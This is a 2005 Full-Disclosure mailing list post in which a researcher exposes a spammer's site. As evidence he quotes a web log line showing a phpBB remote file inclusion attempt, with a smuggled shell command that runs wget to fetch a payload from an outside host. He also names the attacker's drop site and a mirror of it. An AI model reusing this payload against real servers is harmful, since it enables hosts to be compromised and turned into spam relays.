[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Microsoft MSN MESSENGER PATCH PLUS. Download
From: Tom Ferris <tommy () security-protocols ! com>
Date: 2005-07-29 2:21:09
Message-ID: Pine.LNX.4.63.0507281920190.13511 () secpro ! servermatrix ! com
[Download RAW message or body]
Just wanted to expose this spammers site. I noticed the following in my
web logs:
200.233.226.8 - - [27/Jul/2005:20:16:08 -0700] "GET
/admin_styles.php?phpbb_root_path=http://pharoeste.net/x/out.gif?&cmd=cd%20/tmp;%20wget%20http://binaryshadow.org/~w00t
/dc.txt;ls HTTP/1.1" 404 7279 "-" "Mozilla/5.0 (Windows; U; Windows NT
5.1; pt-BR; rv:1.7.8) Gecko/20050511
Firefox/1.0.4"
It is apparent from the logs above and research I have done that he is
trying to exploit a phpBB vuln in order to
compromise hosts and use them as spam relays.
spammers drop site:
http://www.binaryshadow.org/~w00t/
mirror:
http://www.security-protocols.com/binaryshadow-mirror/
Thanks,
Tom Ferris
Researcher
www.security-protocols.com
Key fingerprint = 0DFA 6275 BA05 0380 DD91 34AD C909 A338 D1AF 5D78
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic